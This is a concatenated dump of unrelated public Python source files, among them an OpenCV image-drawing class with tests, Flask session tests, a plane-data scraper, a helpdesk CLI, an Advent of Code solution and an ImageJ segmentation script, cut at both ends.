self.type == 'color':\n l1 = 3\n else:\n print('set_px_RC: image type')\n quit()\n if type(value) == type(5):\n l2 = 1\n if type(value) == type((0,0,0)):\n l2 = 3\n assert l1 == l2, 'attempting to set wrong pixel size (RGB vs mono)'\n self.image[row][col] = value\n return\n \n def get_px_XYmm(self,Xmm,Ymm):\n row,col = self.XYmm2RC(Xmm,Ymm)\n return self.image[row,col]\n \n def XYmm2RC(self,Xmm,Ymm): \n row = int(self.rows/2 - Ymm/self.scale + 0.5)\n col = int(self.cols/2 + Xmm/self.scale + 0.5)\n return (row, col)\n \n def RC2XYmm(self,row,col):\n Xmm = col*self.scale - self.ctXmm - 0.5\n Ymm = -1*row*self.scale + self.ctYmm - 0.5\n return (Xmm, Ymm)\n \n # create a new bookImage scaled down by factor\n def downvert(self, factor):\n print('downvert: scaling down by factor: ',factor)\n tmp = self.icopy() \n tmp.scale = self.scale * factor # mm_per_pixel\n sh = self.image.shape\n img_width = int(sh[1] / factor)\n img_height = int(sh[0] / factor)\n tmp.rows = img_height\n tmp.cols = img_width\n tmp.image = cv2.resize(tmp.image, (img_width,img_height))\n # set up the size/shape parameters\n tmp.width_mm = tmp.cols*tmp.scale\n tmp.height_mm = tmp.rows*tmp.scale\n tmp.ctXmm = tmp.width_mm/2.0 # mm offset to center of image H\n tmp.ctYmm = tmp.height_mm/2.0 # mm offset to center of image V\n \n return tmp \n\n def blur_mm_rad(radius):\n b = int(radius/self.scale)\n if b%2 == 0: # radius must be odd # \n b+=1 \n tmp = cv2.GaussianBlur(self.image, (b,b), 0)\n self.image = tmp\n return \n \n def Get_mmBounds(self):\n xmin = -self.width_mm/2\n ymin = -self.height_mm/2\n xmax = self.width_mm/2\n ymax = self.height_mm/2\n return (xmin, xmax, ymin, ymax)\n \n def Dline_ld(self,ld,color,width=3): # draw line based on line dict params\n p1 = (ld['xmin'], ld['m0']*ld['xmin'] + ld['b0'] + ld['ybias'])\n p2 = (ld['xmax'], ld['m0']*ld['xmax'] + ld['b0'] + ld['ybias'])\n self.Dline_mm(p1,p2,color,width)\n \n # Draw a line/rect in mm coordinates\n #\n # p1 = (p1X, p1Y) etc\n # NOTE: drawing uses \"Points()\" not [row,col]!!!!!\n def Dline_mm(self, p1xy, p2xy, st_color, width=3):\n p1_px = self.XYmm2RC( p1xy[0], p1xy[1]) # Xmm, Ymm\n p2_px = self.XYmm2RC( p2xy[0], p2xy[1])\n #print('Dline_mm: Drawing line from {:} to {:} (row,col)'.format(p1_px,p2_px))\n cv2.line(self.image, RC2PXY(p1_px), RC2PXY(p2_px), bpar.colors[st_color], width)\n \n \n \n def Drect_mm(self, p1, p2, st_color, width=3):\n p1_px = self.XYmm2RC(p1[0], p1[1])\n p2_px = self.XYmm2RC(p2[0], p2[1])\n cv2.rectangle(self.image, RC2PXY(p1_px), RC2PXY(p2_px), bpar.colors[st_color], width)\n \n # draw a square to mark a spot centered on p1\n def Dmark_mm(self, p1mm, side, color):\n #side = square side length in mm \n # get corners of square\n ps1 = ( p1mm[0] - side/2, p1mm[1] - side/2 ) \n ps2 = ( p1mm[0] + side/2, p1mm[1] + side/2 )\n self.Drect_mm(ps1,ps2,color)\n \n # draw a square to mark a spot centered on p1\n def Dmark_px(self, p1RC, side, color):\n #side = square side length in pixels \n # get corners of square\n ps1 = ( int(p1RC[0] - side/2), int(p1RC[1] - side/2) ) \n ps2 = ( int(p1RC[0] + side/2), int(p1RC[1] + side/2) )\n self.Drect_px(ps1,ps2,color)\n \n def Dline_px(self, p1, p2, st_color, width=3):\n p1r = (p1[1],p1[0])\n p2r = (p2[1],p2[0])\n cv2.line(self.image, p1r, p2r, bpar.colors[st_color], width)\n\n \n def Drect_px(self, p1, p2, st_color, width=3):\n p1r = RC2PXY(p1)\n p2r = RC2PXY(p2)\n cv2.rectangle(self.image, p1r, p2r, bpar.colors[st_color], width)\n \n def Dxy_axes(self):\n # Draw H and V axes (X,Y axes in mm) \n (xmin, 
xmax, ymin, ymax) = self.Get_mmBounds()\n\n self.Dline_mm((xmin,0), (xmax,0),'white')\n self.Dline_mm((0, ymin), (0, ymax), 'white')\n\n ## Draw some tick marks\n tick_locs_mm = [] # pix\n tickwidth = 20 # mm\n for xt in range(int(xmax/tickwidth)): # unitless\n xpt = tickwidth*(xt+1) # mm\n tick_locs_mm.append(xpt)\n tick_locs_mm.append(-xpt)\n ya = 0.0 #mm\n yb = -5.0 #mm\n for x in tick_locs_mm:\n self.Dline_mm((x, ya), (x,yb), 'green') # draw the tick marks\n \ndef approx(a,b):\n if abs(a-b) < 0.0001:\n return True\n else:\n return False\n \ndef printpass(str):\n print('\\n {:40} PASS\\n'.format(str))\n \n \nif __name__=='__main__':\n \n print('\\n\\n Testing bookImage class \\n\\n')\n \n img_paths = gb.glob('tiny/testimage2.png')\n d2r = 2*np.pi/360.0 #deg to rad\n\n if (len(img_paths) < 1):\n print('No files found')\n quit()\n for pic_filename in img_paths:\n print('looking at '+pic_filename)\n #img_gray, img = pre_process(pic_filename)\n #cv2.IMREAD_GRAYSCALE\n \n #\n # read in the image\n #\n #img = cv2.imread(pic_filename, cv2.IMREAD_COLOR)\n img_orig = cv2.imread(pic_filename, cv2.IMREAD_COLOR)\n tsti = img_orig.copy() # copy of original for visualization \n\n sh = img_orig.shape\n print('Original: {:} rows, {:} cols.'.format(sh[0],sh[1]))\n \n #Instantiate\n pixels_per_mm = 5.0\n mm_per_pixel = 1.0/pixels_per_mm\n tim1 = bookImage(img_orig, mm_per_pixel) # mm/pixel\n \n sh2 = tim1.ishape()\n assert sh == sh2, 'shape method FAILS'\n \n printpass('ishape() tests')\n \n ## # converting tests\n \n ## TEST mm to row,col on 4 corners of a squares\n #print('Converted value of XY=( 0.0, 0.0)mm is', tim1.XYmm2RC( 0.0, 0.0))\n #print('Converted value of XY=(50.0,25.0)mm is', tim1.XYmm2RC( 50.0,25.0))\n fs = 'mm to pixel conversion ERROR'\n assert tim1.XYmm2RC( 0.0, 0.0) == (544,810), fs\n assert tim1.XYmm2RC( 50.0,25.0) == (419,1060), fs\n assert tim1.XYmm2RC( 50.0, 0.0) == (544,1060), fs\n assert tim1.XYmm2RC( 0.0,25.0) == (419,810), fs\n \n printpass('XYmm2RC tests')\n \n rtst = 100\n ctst = 250\n \n pxymm = tim1.RC2XYmm(rtst,ctst)\n assert tim1.XYmm2RC(pxymm[0],pxymm[1]) == (rtst,ctst), 'RC->XY->RC FAILS'\n \n printpass('XYmm2RC(RC2XYmm(R,C) test')\n \n ## TEST row,col to mm\n \n print('Converted value of ', int(tim1.rows/2), int(tim1.cols/2),' is ', tim1.RC2XYmm(tim1.rows/2,tim1.cols/2))\n fs = 'pixel to mm conversion ERROR'\n x = tim1.RC2XYmm(tim1.rows/2,tim1.cols/2)\n assert approx(x[0],0.0), fs\n assert approx(x[1],0.0), fs\n \n \n x = tim1.RC2XYmm(tim1.rows/2+10,tim1.cols/2+20)\n #print(' 10, 20 px more: ', x)\n assert approx(x[0], 4), fs\n assert approx(x[1], -2), fs\n \n printpass('center conversion tests')\n \n ##\n #\n # Test icopy() vs make new image\n #\n \n tst_icop = tim1.icopy()\n tst_newbI = bookImage(tim1.image, tim1.scale)\n \n #assert tst_icop.image == tst_newbI.image, 'image mismatch'\n assert tst_icop.scale == tst_newbI.scale, 'scale mismatch'\n assert tst_icop.height_mm == tst_newbI.height_mm, 'height_mm mismatch'\n assert tst_icop.width_mm == tst_newbI.width_mm, 'width_mm mismatch'\n assert tst_icop.rows == tst_newbI.rows, 'rows mismatch'\n assert tst_icop.cols == tst_newbI.cols, 'cols mismatch'\n assert tst_icop.ctXmm == tst_newbI.ctXmm, 'ctXmm mismatch'\n assert tst_icop.ctYmm == tst_newbI.ctYmm, 'ctYmm mismatch'\n\n printpass('copy vs. 
newinstance')\n \n \n #\n # test drawing\n #\n \n # Place marks in right places:\n \n tim1.Dmark_mm(( 0.0, 0.0), 2, 'red')\n tim1.Dmark_mm(( 10.0, 0.0), 2, 'red')\n tim1.Dmark_mm(( 20.0,10.0), 2, 'red')\n tim1.Dmark_mm(( -10.0,-50.0), 2, 'red')\n \n # test rectangle drawing\n # (should be predominantly horizontal)\n tim1.Drect_mm( (-80,-20), (-10,-10), 'green')\n \n # pixel line from one corner (almost) to the other\n tim1.Dline_px( (10,10), (1079,1610),'red')\n \n # draw some test lines in px:\n \n for i in range(10):\n r = 50*i\n midpoint = int(tim1.cols/2)\n p1 = (r,midpoint)\n p2 = (r,midpoint+500)\n tim1.Dline_px(p1,p2,'yellow',width=2)\n \n for i in range(10):\n ymm = 100 - 50*tim1.scale*i\n midpoint = 0.0\n xmm = midpoint\n p1 = (xmm, ymm)\n p2 = (xmm+500*tim1.scale, ymm)\n tim1.Dline_mm(p1, p2,'white')\n \n tim1.Dline_px( (544,810), (544-250,810+125), 'white')\n \n # pixel line from origin to +x and +y values\n tim1.Dline_mm( (0,0), (50,25), 'green')\n \n \n title='test image'\n cv2.imshow(title, tim1.image)\n cv2.waitKey(5000)\n \n #######################################################################33 Scale Down\n #\n # Now try similar tests with scaled image\n #\n #tim2 = bookImage(cv2.imread(pic_filename, cv2.IMREAD_COLOR), mm_per_pixel).downvert(4.0)\n print('\\n\\n----------------------------------')\n print('original image;')\n tim1.ishape()\n tim2 = tim1.icopy()\n print('generating scaled test image: ')\n tim2 = tim1.downvert(4.0) \n tim2.ishape()\n\n #tim2.Dxy_axes()\n tim2.Dline_px((100,100),(200,400),'green') \n tim2.Dmark_px((200,200),14,'yellow')\n tim2.Dmark_px((200,300),14,'blue')\n \n \n # Plot a line in mm on scaled image\n th = 145\n xintercept = 80\n llength = bpar.book_edge_line_length_mm\n bias = -20\n ld2 = nf.Get_line_params(th, xintercept, llength, bias)\n tim2.Dline_ld(ld2,'white')\n \n ### draw mm coordinate system\n tim2.Dxy_axes()\n \n cv2.imshow('Scaled Down Test',tim2.image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n \n \n \n","repo_name":"blake5634/Book-Spine_2","sub_path":"book_classes.py","file_name":"book_classes.py","file_ext":"py","file_size_in_byte":12939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19517296027","text":"import numpy as np\nimport pandas as pd\nimport scipy.io\n\n\ndef get_Sondata(filename):\n with open(filename, 'r') as file:\n Sonfile = []\n line = file.readline()\n while line != \"\":\n dataset = {'Header': [], 'Params': {}, 'Data': []}\n while (line.split(' ')[0] not in ['R', 'TERM', 'FTERM'] and '=' not in line) and line != \"\":\n if line.split(' ')[0] == 'FTERM':\n for i in range(3):\n dataset['Header'].append(line.replace('\\n', ''))\n line = file.readline()\n else:\n dataset['Header'].append(line.replace('\\n', ''))\n line = file.readline()\n dataset['Header'].append(line.replace('\\n', ''))\n colnames = file.readline().replace('\\n', '').split(',')\n dataset['Data'] = pd.DataFrame(columns=colnames)\n line = file.readline()\n while \"=\" in line:\n Param, Val = line.replace(' ', '').split('=')\n dataset['Params'][Param] = float(Val)\n line = file.readline()\n ind = 0\n while np.fromstring(line, sep=',').size == len(colnames):\n dataset['Data'].loc[ind] = np.fromstring(\n line.replace('\\n', ''), sep=\",\"\n )\n ind += 1\n line = file.readline()\n Sonfile.append(dataset)\n return Sonfile\n\n\ndef gen_Qdesign(Soncsv, savemat=False, matname=\"Qdesign\"):\n # Make Qdesign array for Matlab select_Classicdesign()\n numcol = 1 + len(Soncsv)\n numrow = 1 + 
len(Soncsv[0][\"Data\"].index)\n Qdesign = np.zeros((numrow, numcol))\n Qdesign[0, 1:] = [Soncsv[i][\"Params\"][\"Lc\"] for i in range(len(Soncsv))]\n Qdesign[1:, 0] = Soncsv[0][\"Data\"][\"Frequency (GHz)\"].values\n for i, dataset in enumerate(Soncsv):\n Lc = dataset[\"Params\"][\"Lc\"]\n for j, freq in enumerate(dataset[\"Data\"][\"Frequency (GHz)\"].values):\n if freq in Qdesign[:, 0] and Lc in Qdesign[0, :]:\n Qdesign[Qdesign[:, 0] == freq, Qdesign[0, :] == Lc] = np.log10(\n np.pi / (2 * (10 ** (dataset[\"Data\"][\"DB[S13]\"].iloc[j] / 20)) ** 2)\n )\n\n assert (\n 0 not in Qdesign[1:, 1:]\n ), \"Data not complete: probably ABS frequency Sonnet data\"\n if savemat:\n scipy.io.savemat(matname + \".mat\", dict(Qdesign=Qdesign))\n return Qdesign\n","repo_name":"sahderooij/MKID-models","sub_path":"kidesign/simdata.py","file_name":"simdata.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"21001834315","text":"import json\nimport unittest\nimport session_example.app as app\n\n\nclass SessionExampleTest(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super(SessionExampleTest, self).__init__(*args, **kwargs)\n\n def setUp(self):\n self.app_sess1 = app.app.test_client()\n self.app_sess2 = app.app.test_client()\n\n def test_new_session_no_cookie(self):\n \"\"\" Test that we get a new cookie if we send a new, bare request \"\"\"\n\n with self.app_sess1 as c:\n ret = c.get('/')\n self.assertIn('Set-Cookie', ret.headers)\n\n def test_existing_session_cookie(self):\n \"\"\" Test that two requests in the same session has the same session data \"\"\"\n\n with self.app_sess1 as c:\n ret1 = c.get('/')\n ret2 = c.get('/')\n self.assertEqual(ret1.data, ret2.data)\n\n def test_distinct_sessions_cookie(self):\n \"\"\" Test that two distinct requests are distinct sessions \"\"\"\n\n sess1 = None\n sess2 = None\n with self.app_sess1 as c:\n sess1 = c.get('/').data\n\n with self.app_sess2 as c:\n sess2 = c.get('/').data\n\n self.assertNotEqual(sess1, sess2)\n\n def test_new_session_no_cookie_auth_token(self):\n \"\"\" Test that no cookie is sent back in the response when x-auth-token header is set \"\"\"\n\n with self.app_sess1 as c:\n ret = c.get('/', headers={'X-Auth-Token': 'pretend_token'})\n self.assertNotIn('Set-Cookie', ret.headers)\n\n def test_new_session_created_with_auth_json_no_cookie(self):\n \"\"\" Test that no cookie is sent with the response if a new session is created with a \"token\"\n key present in a JSON request.\n \"\"\"\n\n with self.app_sess1 as c:\n data = {\n \"token\": \"pretend_token\"\n }\n ret = c.post('/', data=json.dumps(data), headers={'Content-Type': 'application/json'})\n self.assertNotIn('Set-Cookie', ret.headers)\n\n def test_new_session_create_with_auth_json(self):\n \"\"\" Test that a new session is created when a \"token\" key is present in a JSON request\n body.\n \"\"\"\n\n with self.app_sess1 as c:\n data = {\n \"token\": \"pretend_token\"\n }\n ret1 = c.post('/', data=json.dumps(data), headers={'Content-Type': 'application/json'})\n ret2 = c.get('/', headers={'X-Auth-Token': 'pretend_token'})\n\n self.assertEqual(ret1.data, ret2.data)\n\n def test_session_auth_token(self):\n \"\"\" Test that sending a token in x-auth-token creates a session \"\"\"\n\n sess1 = None\n sess2 = None\n test_header = {'X-Auth-Token': 'pretend_token'}\n\n with self.app_sess1 as c:\n ret = c.get('/', headers=test_header)\n sess1 = ret.data\n\n with self.app_sess2 as c:\n 
ret = c.get('/', headers=test_header)\n sess2 = ret.data\n\n self.assertEqual(sess1, sess2)\n\n def test_distinct_sessions_auth_token(self):\n \"\"\" Test that two distinct auth tokens result in distinct sessions \"\"\"\n\n sess1 = None\n sess2 = None\n\n with self.app_sess1 as c:\n ret = c.get('/', headers={'X-Auth-Token': 'pretend_token'})\n sess1 = ret.data\n\n with self.app_sess2 as c:\n ret = c.get('/', headers={'X-Auth-Token': 'another_pretend_token'})\n sess2 = ret.data\n\n self.assertNotEqual(sess1, sess2)\n\n def test_existing_session_auth_token(self):\n \"\"\" Test that two requests in the same session has the same session data (using token) \"\"\"\n\n test_header = {'X-Auth-Token': 'pretend_token'}\n\n with self.app_sess1 as c:\n ret1 = c.get('/', headers=test_header)\n ret2 = c.get('/', headers=test_header)\n self.assertEqual(ret1.data, ret2.data)\n","repo_name":"eljrax/flask_token_cookie_sessions","sub_path":"app/tests/test_session_example.py","file_name":"test_session_example.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"41187180140","text":"import os\nimport time\n\nimport numpy as np\nimport pandas as pd\n\nfrom download_plane_data import parse_plane\nfrom download_planes_list import download_plane_list\n\nbase_url = \"https://www.airfleets.net\"\n# List of the plane models to parse\nplane_list_file = \"planes_list.csv\"\n# Actual file to store data from\n# every plane in the webpage\nplanes_file = \"planes.csv\"\n\n# If we already have the list of planes open it\n# Otherwise create the list extracting it from the webpage\nif not os.path.isfile(plane_list_file):\n planes = download_plane_list(base_url)\n df = pd.DataFrame(planes, columns=[\"plane_name\", \"link\"])\n df.to_csv(plane_list_file, index=True)\n\ndf = pd.read_csv(plane_list_file)\n\nplanes_matrix = df.as_matrix()\n# Continue progress if the data file already exists\n# By checking last plane downloaded.\nif not os.path.isfile(planes_file):\n df_planes = pd.DataFrame(\n columns=(\"plane_name\", \"msn\", \"type\", \"airline\", \"first_flight\", \"registration\", \"status\")\n )\n df_planes.to_csv(planes_file, index=False)\nelse:\n last_plane_scrapped = pd.read_csv(planes_file)[\"plane_name\"].values[-1]\n index = df[df[\"plane_name\"] == last_plane_scrapped].index[-1] + 1\n print(f\"Starting at {planes_matrix[index, 1]}\")\n planes_matrix = planes_matrix[index:]\n\nfor plane in planes_matrix:\n planes_data = []\n empty_page = False\n page_number = 1\n plane_data_url = f\"{base_url}{plane[2]}\"\n plane_name = plane[1]\n # Loop over page numbers\n while not empty_page:\n plane_page_data = parse_plane(plane_data_url, plane_name)\n time.sleep(3)\n page_number += 1\n plane_data_url = plane_data_url.replace(f\"{page_number - 1}.htm\", f\"{page_number}.html\")\n if not plane_page_data:\n empty_page = True\n else:\n planes_data += plane_page_data\n # Save current data\n df_planes = pd.DataFrame(\n planes_data,\n columns=(\"plane_name\", \"msn\", \"type\", \"airline\", \"first_flight\", \"registration\", \"status\"),\n )\n pd.concat([pd.read_csv(planes_file), df_planes]).to_csv(planes_file, index=False, header=True)\n print(f\"{plane_name}\")\n","repo_name":"Gonzalo933/world_airfleets_data","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"29183671145","text":"tickets = 
[]\r\n\r\ndef create_ticket(ticket_id, title, description):\r\n ticket = {\r\n \"ticket_id\": ticket_id,\r\n \"title\": title,\r\n \"description\": description,\r\n \"status\": \"Open\"\r\n }\r\n tickets.append(ticket)\r\n print(\"Ticket created successfully.\")\r\n\r\ndef view_tickets():\r\n if not tickets:\r\n print(\"No tickets available.\")\r\n else:\r\n print(\"All Tickets:\")\r\n for ticket in tickets:\r\n print(\"Ticket ID: \",ticket['ticket_id'])\r\n print(\"Title: \",ticket['title'])\r\n print(\"Description: \",ticket['description'])\r\n print(\"Status: \",ticket['status'])\r\n print(\"-------------------------\")\r\n\r\ndef update_ticket_status(ticket_id, status):\r\n for ticket in tickets:\r\n if ticket[\"ticket_id\"] == ticket_id:\r\n ticket[\"status\"] = status\r\n print(\"Ticket status updated successfully.\")\r\n return\r\n print(\"Ticket not found.\")\r\n\r\ndef delete_ticket(ticket_id):\r\n for ticket in tickets:\r\n if ticket[\"ticket_id\"] == ticket_id:\r\n tickets.remove(ticket)\r\n print(\"Ticket deleted successfully.\")\r\n return\r\n print(\"Ticket not found.\")\r\n\r\ndef customer_menu():\r\n while True:\r\n print(\"\\n--- Customer Menu ---\")\r\n print(\"1. Create a ticket\")\r\n print(\"2. View all tickets\")\r\n print(\"3. Exit\")\r\n\r\n choice = input(\"Enter your choice (1-3): \")\r\n\r\n if choice == \"1\":\r\n ticket_id = input(\"Enter ticket ID: \")\r\n title = input(\"Enter ticket title: \")\r\n description = input(\"Enter ticket description: \")\r\n create_ticket(ticket_id, title, description)\r\n\r\n elif choice == \"2\":\r\n view_tickets()\r\n\r\n elif choice == \"3\":\r\n print(\"Exiting the customer menu...\")\r\n break\r\n\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\ndef manager_menu():\r\n while True:\r\n print(\"\\n--- Manager Menu ---\")\r\n print(\"1. View all tickets\")\r\n print(\"2. Update ticket status\")\r\n print(\"3. Delete a ticket\")\r\n print(\"4. Exit\")\r\n\r\n choice = input(\"Enter your choice (1-4): \")\r\n\r\n if choice == \"1\":\r\n view_tickets()\r\n\r\n elif choice == \"2\":\r\n ticket_id = input(\"Enter ticket ID to update status: \")\r\n status = input(\"Enter new status: \")\r\n update_ticket_status(ticket_id, status)\r\n\r\n elif choice == \"3\":\r\n ticket_id = input(\"Enter ticket ID to delete: \")\r\n delete_ticket(ticket_id)\r\n\r\n elif choice == \"4\":\r\n print(\"Exiting the manager menu...\")\r\n break\r\n\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\ndef menu():\r\n while True:\r\n print(\"\\n--- Helpdesk Management System ---\")\r\n print(\"1. Customer Menu\")\r\n print(\"2. Manager Menu\")\r\n print(\"3. Exit\")\r\n\r\n choice = input(\"Enter your choice (1-3): \")\r\n\r\n if choice == \"1\":\r\n customer_menu()\r\n\r\n elif choice == \"2\":\r\n manager_menu()\r\n\r\n elif choice == \"3\":\r\n print(\"Exiting the program...\")\r\n break\r\n\r\n else:\r\n print(\"Invalid choice. 
Please try again.\")\r\n\r\nmenu()\r\n","repo_name":"ishwaribarne/LP2.github.io","sub_path":"LP2_Codes/LP2_Codes/EX_helpDesk.py","file_name":"EX_helpDesk.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16043053462","text":"input = [a.strip() for a in open('./13/input.txt', 'r')]\npairs = [(int(i/3+1),input[i],input[i+1]) for i in range(0,(len(input)),3)]\n\ndef checkPairs(left, right) : # 1 correct order, 0 equal, -1 wrong\n if type(left) == int and type(right) is int:\n return 1 if left < right else -1 if right < left else 0\n\n if type(left) is list and type(right) is int : right = [right]\n if type(left) is int and type(right) is list : left = [left]\n\n for i in range(0,len(left)) :\n if i >= len(right) : return -1\n c = checkPairs(left[i],right[i])\n if c != 0 : return c\n \n return 1 if len(left) < len(right) else 0\n\nresults = [(a[0],checkPairs(eval(a[1]), eval(a[2]))) for a in pairs]\nprint(f'Part A: Sum of correct pairs Idx {sum([r[0] for r in results if r[1] == 1])}') # assert 13\n\ninput = [i for i in input if i != ''] + ['[[2]]','[[6]]']\noutput = [input[0]]\nfor i in input[1:] :\n for o in range(0,len(output)) :\n if checkPairs(eval(output[o]), eval(i)) == -1:\n output.insert(o, i)\n break\n if i not in output : output.append(i)\n\nres = (output.index('[[2]]')+1) * (output.index('[[6]]')+1)\nprint(f'Part B: Packet decode {res}') # assert 140","repo_name":"DeclanOGorman/AdventofCode2022","sub_path":"13/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22484384889","text":"#coding:utf-8\nimport json,os,time\nfrom urllib.parse import urlencode\nimport requests\nimport unittest\nimport HTMLTestRunner\nfrom ddt import data,unpack,ddt\nimport sys\nimport dbclass\nfrom ExcelUtil import ExcelUtil\n\n\nqueryCountrysByCityId = ExcelUtil('isCommonCity.xlsx','queryCitysById')\nqueryCountryById = ExcelUtil('isCommonCity.xlsx','queryCountryById')\n@ddt\nclass Country(unittest.TestCase):\n def setUp(self):\n self.url = 'http://10.10.32.105/v1/'\n\n @data(*queryCountrysByCityId.next())\n def test_queryCountrysByCityId(self,data):\n u'''根据二级城市ID获取三级区县列表'''\n r =requests.get('http://10.10.32.105/v1/country/queryCountrysByCityId/'+str(data[0]))\n self.assertEqual(r.status_code,200,\"返回值应为200,实为:\"+str(r.status_code))\n db = dbclass.dbClass('10.10.20.108','jsjy','jsjy2015','common')\n r_data = json.loads(r.text)\n db_data =db.fetchall(\"SELECT id,city_id,name FROM m_county where status = 1 AND city_id = \"+ str(data[0]))\n num = len(r_data)\n for x in range(0,num):\n self.assertEqual(r_data[x]['id'],str(db_data[x]['id']))\n self.assertEqual(str(r_data[x]['cityId']),str(db_data[x]['city_id']))\n self.assertEqual(r_data[x]['name'],db_data[x]['name'])\n\n @data(*queryCountryById.next())\n def test_queryCountryById(self,data):\n u'''根据三级iD获取三级区县列表'''\n r = requests.get('http://10.10.32.105/v1/country/queryCountryById/'+str(data[0]))\n self.assertEqual(r.status_code,200,\"返回值应为200,实为:\"+str(r.status_code))\n r_data = json.loads(r.text)\n db = dbclass.dbClass('10.10.20.108','jsjy','jsjy2015','common')\n db_data =db.fetchall(\"SELECT * FROM m_county where id = \"+ str(data[0]))\n\n self.assertEqual(r_data['id'],str(db_data[0]['id']))\n self.assertEqual(str(r_data['cityId']),str(db_data[0]['city_id']))\n 
self.assertEqual(r_data['name'],db_data[0]['name'])","repo_name":"gilbert1989/depends","sub_path":"country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71326698690","text":"import codecs, re\nf = codecs.open('vk/MDK_0.txt','r','cp1251')\nr = f.readlines()\nf.close()\nx = []\n'''\nfor line in r:\n if not re.search('\\t|cerrar|editar|Me|Compartir|Sugerir|Adjuntar|foto|desarrolladores|vide|enlaces|nastya|evgenia|aleksandra|deos|gif|ginas|ksenia|segui|ivaro|Comentar|mostrar|Hace|temas|introducir|</.*?>|VK © 2014|debates|<video.*?>|Otros|advertising|CONTACTOS|Ilia|Darse|suscrito|Suscribirse|favoritos',line,re.IGNORECASE|re.UNICODE):\n x.append(line)\n'''\nl = open('mdk_text_final_0','w')\nn = ''\nauthor = ''\npost = ''\nfor line in r:\n if line.startswith(('Compartir','hace','<','Ocultar','el','ayer','Mostrar')):\n continue\n if line.endswith('>\\n'):\n author = re.sub('<.*>','',line).strip()\n continue\n if line.startswith('Me gusta'):\n post = '<message author= '+author+'>'+post+'</message>\\n'\n n += post\n post = ''\n else:\n line = re.sub('\\n',' ',line)\n line = re.sub('|Responder','',line)\n line = re.sub('<.*>','',line,re.DOTALL|re.IGNORECASE|re.UNICODE)\n post += line\nl.write(n)\nl.close()\n","repo_name":"denis-gordeev/parsers","sub_path":"vk.py","file_name":"vk.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3675689575","text":"print('Meal Cost -- ')\nmealCost = float(input())\n\nprint('Tip Percent -- ')\ntipPercent = int(input())\n\nprint('Tax Percent -- ')\ntaxPercent = int(input())\n\ntip = mealCost * tipPercent / 100\ntax = mealCost * taxPercent / 100\ntotalCost = mealCost + tip + tax\nprint(\"The total meal cost is \" + str(round(totalCost)) + \" dollars.\")","repo_name":"naimjeem/python-field","sub_path":"basic/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74719420608","text":"import os\nfrom ij import IJ\nimport glob\nfrom ij.plugin.frame import RoiManager\n\n_threshold_percent = 0.9\n\nbf_path = r\"C:\\Users\\johnp\\Box\\Finkelstein-Matouschek\\images\\20220325_Moment_Panda_Demo\\moment_data\\20220325_BY4741_no-plasmid_exp030s_moment_004_bf.tif\"\n\ndef get_percentile(imp, percentile):\n\n IJ.log(\"Segmenting brightfield with percentile threshold {}\".format(percentile))\n\n stats = imp.getRawStatistics()\n hist = stats.histogram()\n \n hist_x_min = stats.histMin\n hist_x_max = stats.histMax\n hist_x_range = hist_x_max - hist_x_min\n \n hist_x_values = []\n \n for bin in range(0, stats.nBins):\n \n #print(\"Fraction pixels with intensity in bins 0 to {}\".format(bin))\n integral = sum(hist[0:bin])/sum(hist)\n #print(integral)\n \n intensity = hist_x_range * bin/stats.nBins\n hist_x_values.append(intensity)\n \n #print(intensity)\n \n if integral > percentile:\n threshold_intensity = intensity\n break\n else:\n pass\n\n return threshold_intensity\n\ndef threshold_brightfield(imp, threshold_percent):\n # this code is based on my \"Threshold brightfield [Q]\" macro. 
Need to automate \n # finding threshold values instead of hardcoding themm here.\n IJ.run(\"Find Edges\")\n lower_threshold = get_percentile(imp, threshold_percent)\n IJ.setThreshold(lower_threshold, 65535)\n IJ.run(\"Convert to Mask\")\n IJ.run(\"Fill Holes\")\n IJ.run(\"Watershed\")\n \ndef create_rois():\n # Create rois based on (in this script) the process brightfield image.\n # Also scale the rois down using my plugin scale_rois.py\n IJ.run(\"Set Measurements...\", \"area mean standard min centroid center perimeter bounding fit feret's integrated median stack display redirect=None decimal=3\")\n IJ.run(\"Analyze Particles...\", \"size=100-8000 pixel circularity=0.60-1.00 exclude add in_situ\")\n \n#for i in range(-10, 10):\n#\tIJ.open(bf_path)\n#\timp = IJ.getImage()\n#\t\n#\tthreshold_value = _threshold_percent + i*0.01\n#\tthreshold_brightfield(imp, threshold_value)\n#\tcreate_rois()\n\n\nimp = IJ.getImage()\nthreshold_brightfield(imp, 0.85)","repo_name":"johnpcooper/imagejpc","sub_path":"plugins/scratch/stead_state_segmentation.py","file_name":"stead_state_segmentation.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"38608511169","text":"import os\nimport sys\nimport pytest\nfrom pathlib import Path\n\nsrc_dir = Path(__file__).resolve().parents[1]\nmodel_dir = os.path.join(src_dir, 'models')\nsys.path.append(model_dir)\n\nfrom hydra import initialize, compose\nfrom utils import parse_inputs\n\ndef test_parser():\n with initialize(version_base=None, config_path='../conf'):\n config = compose(config_name=\"config\")\n \n for k1 in config.keys():\n 